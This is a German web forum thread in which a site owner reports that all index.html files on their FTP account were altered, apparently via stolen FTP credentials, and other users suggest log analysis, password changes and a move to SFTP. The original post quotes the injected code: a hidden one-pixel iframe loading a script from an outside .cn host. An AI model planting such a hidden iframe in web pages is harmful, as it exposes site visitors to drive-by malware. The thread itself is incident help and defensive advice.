Virus ??
0 0 0 0 
Auge
0 
Patrick Andrieu
0
Virus ??
Hallo,
wir haben heute gesehen das am Samstag jemand unseren FTP geändert hat, also unsere index.html Datei wurde geändert.
Wir haben folgendes entdeckt:
<iframe src="http://perfectnamestore.cn/in.cgi?income6" width=1 height=1 style="visibility: hidden"></iframe>
Entsprechend hat der Virenscanner bei unserer Seite einen Virus gemeldet.
Wie unser FTP Passwort "gehackt" wurde und was dieser iframe macht ist uns ein Rätsel.
google weiß davon auch noch nichts.
-
Hi there,
Wie unser FTP Passwort "gehackt" wurde und was dieser iframe macht ist uns ein Rätsel.
Der iframe macht einmal gar nix, wenn javscript deaktiviert wurde, mit eingeschaltenem JS würd ich da aber nicht unbdingt hinsurfen;)
-
Moin!
Wie unser FTP Passwort "gehackt" wurde und was dieser iframe macht ist uns ein Rätsel.
google weiß davon auch noch nichts.Vermutlich wurde der Angriff über ein unsicheres Skript auf der Website ausgeführt.
Was läuft denn da so an Software? Irgendein CMS, Blog, Bildergalerie? Was selbstprogrammiertes?
Auf jeden Fall solltest du das Logfile der Site analysieren - mit etwas Glück sind dort die verräterischen Spuren nicht verwischt worden, sondern können Hinweise auf den genutzten Angriffsvektor geben. Ebenso ist das Error-Log interessant.
- Sven Rautenberg
-
Was läuft denn da so an Software? Irgendein CMS, Blog, Bildergalerie?
Es läuft darauf ein einfacher 1&1 Webshop, davor liegt eine index.html Datei, die den Shop in eine englische und eine deutsche Fassung teilt.
Auf dem FTP liegen noch andere Websiten und auf allen Websiten wurden die index.html Dateien "gehackt".
Am Donnerstag war ein Virus auf dem Rechner, der eigentlich wieder entfernt wurde. Vermutlich hat dieser Virus die FTP Daten spioniert.Es muß so sein, die FTP Daten wurden spioniert und damit wurden alle index.html Dateien geändert.
Nun ist nur die Frage was dieses iframe auf meiner Seite angerichtet hat.
Vielen Dank soweit eurer Hilfe!!
-
Hallo
Es läuft darauf ein einfacher 1&1 Webshop, davor liegt eine index.html Datei, die den Shop in eine englische und eine deutsche Fassung teilt.
Auf dem FTP liegen noch andere Websiten und auf allen Websiten wurden die index.html Dateien "gehackt".
Am Donnerstag war ein Virus auf dem Rechner, der eigentlich wieder entfernt wurde. Vermutlich hat dieser Virus die FTP Daten spioniert.Es muß so sein, die FTP Daten wurden spioniert und damit wurden alle index.html Dateien geändert.
Müssen muss garnichts. Es kann so sein, wie du es vermutest, es kann aber ebensogut sein, dass irgendeine auf dem Webserver betriebene, eventuell auch von allen Kunden unabhängige Software als Einfallstor diente.
Wenn es so ist, wie du es vermutest, könnten die von Sven erwähnten Logfiles Hinweise geben.
Tschö, Auge
-
Hallo Alex!
und auf allen Websiten wurden die index.html Dateien "gehackt".
Sicher das selbe Problem wie hier...
Viele Grüße aus Frankfurt/Main,
Patrick--
_ - jenseits vom delirium - _
Diblom [link:hatehtehpehdoppelpunktslashslashwehwehwehpunktatomicminuseggspunktcomslash]
J'ai 10 ans! | Achtung Agentur! | Nichts ist unmöglich? Doch! | Heute schon gegökt?
-
-
-
Der iframe ermöglicht teilweise das Ausspähen von Daten in dessen parent-Fenster. Du solltest ihn schnellstmöglich entfernen, alle Passwörter ändern und FTP durch das gesicherte Protokoll SFTP/SSH ersetzen.
Gruß, LX
--
RFC 1925, Satz 5, Abs. 2: In den meisten Fällen ist das eine schlechte Idee.
